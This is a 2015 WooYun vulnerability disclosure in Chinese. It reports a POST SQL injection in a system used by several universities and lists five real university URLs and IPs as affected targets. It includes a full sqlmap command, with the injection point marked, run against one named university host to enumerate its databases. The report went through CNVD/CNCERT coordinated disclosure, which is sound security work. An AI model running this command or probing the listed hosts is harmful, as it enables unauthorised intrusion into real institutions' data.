当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0119868

漏洞标题:某高校在用系统通用POST注入漏洞

相关厂商:某高校在用系统

漏洞作者: 独孤求败

提交时间:2015-06-12 11:39

修复时间:2015-09-14 11:04

公开时间:2015-09-14 11:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-12: 细节已通知厂商并且等待厂商处理中
2015-06-16: 厂商已经确认,细节仅向厂商公开
2015-06-19: 细节向第三方安全合作伙伴开放
2015-08-10: 细节向核心白帽子及相关领域专家公开
2015-08-20: 细节向普通白帽子公开
2015-08-30: 细节向实习白帽子公开
2015-09-14: 细节向公众公开

简要描述:

rt

详细说明:

某高校在用系统通用POST注入漏洞。
案例:
http://dxsb.qfnu.edu.cn//model/twogradepage/pgsearch.aspx
http://59.69.101.10//model/twogradepage/pgsearch.aspx
http://210.43.24.201:8080/model/twogradepage/pgsearch.aspx
http://yqgx.zstu.edu.cn/model/twogradepage/pgsearch.aspx
http://202.114.33.72/model/twogradepage/pgsearch.aspx

漏洞证明:

注入证明:
http://dxsb.qfnu.edu.cn//model/twogradepage/pgsearch.aspx
搜索单引号:注入报错

QQ图片20150611204535.png


SQLmap注入:

[root@Hacker~]# Sqlmap -u http://dxsb.qfnu.edu.cn//model/twogradepage/pgsearch.a
spx --data "__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=y%2BYugCUjJGL%2FV4lFizVO
Rvj5Nuc9Pd4Qcb%2FDmErH4nGQuaDn%2BEA3o36tbyFwJUI07ECZV8au1GHsyknCvT77Z9UxmFyNYh48
Qv%2FLhNOItu8ICe4g%2FGsCD4%2BeILYli%2Bpo57nu6BK0S58FefAzKVg%2F40S%2FSfLCtMI9vDJl
lROuWsPPxHOSe7UoQjhK7qBErJiFQ3VWRAACDfDsYoI56wVCbYVd2H8VfdD1Nzxtv3PXXxkh1J0WXEXc
8Yim2J36YZASS5iEzg%3D%3D&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=GtISbLZt4x3tp7%
2BNMTuXXspQoL5DQLQnso2zp%2F58hTJ0sAa2rMCnA0dKP4mJfxGvlsIMCzG%2FxP3fvP%2FpxKo0%2B
z8LhrsM%2BBYSNFmlG2s7jZUt0YfDvkXoojNxx%2FmNMdBoGGpRFvgbLybucdX363gNQJHZn9M%3D&ct
l00%24login%24txtName=&ctl00%24login%24txtPwd=&ctl00%24login%24ddlKind=0&ctl00%2
4login%24txt_Code=&ctl00%24ContentPlaceHolder1%24txtKey=%27&ctl00%24ContentPlace
Holder1%24btnSearch=%E6%90%9C%E7%B4%A2" --dbs


QQ图片20150611204456.png


修复方案:

......

版权声明:转载请注明来源 独孤求败@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-06-16 11:03

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT通报,由其后续协调管理单位处置.

最新状态:

暂无


漏洞评价:

评论

  1. 2015-06-12 12:45 | 岩少 ( 普通白帽子 | Rank:586 漏洞数:171 | 破晓团队)

    @孤独求败 你关注的白帽子 独孤求败 发表了漏洞 某高校在用系统通用POST注入漏洞

  2. 2015-06-12 12:54 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    通用之王啊?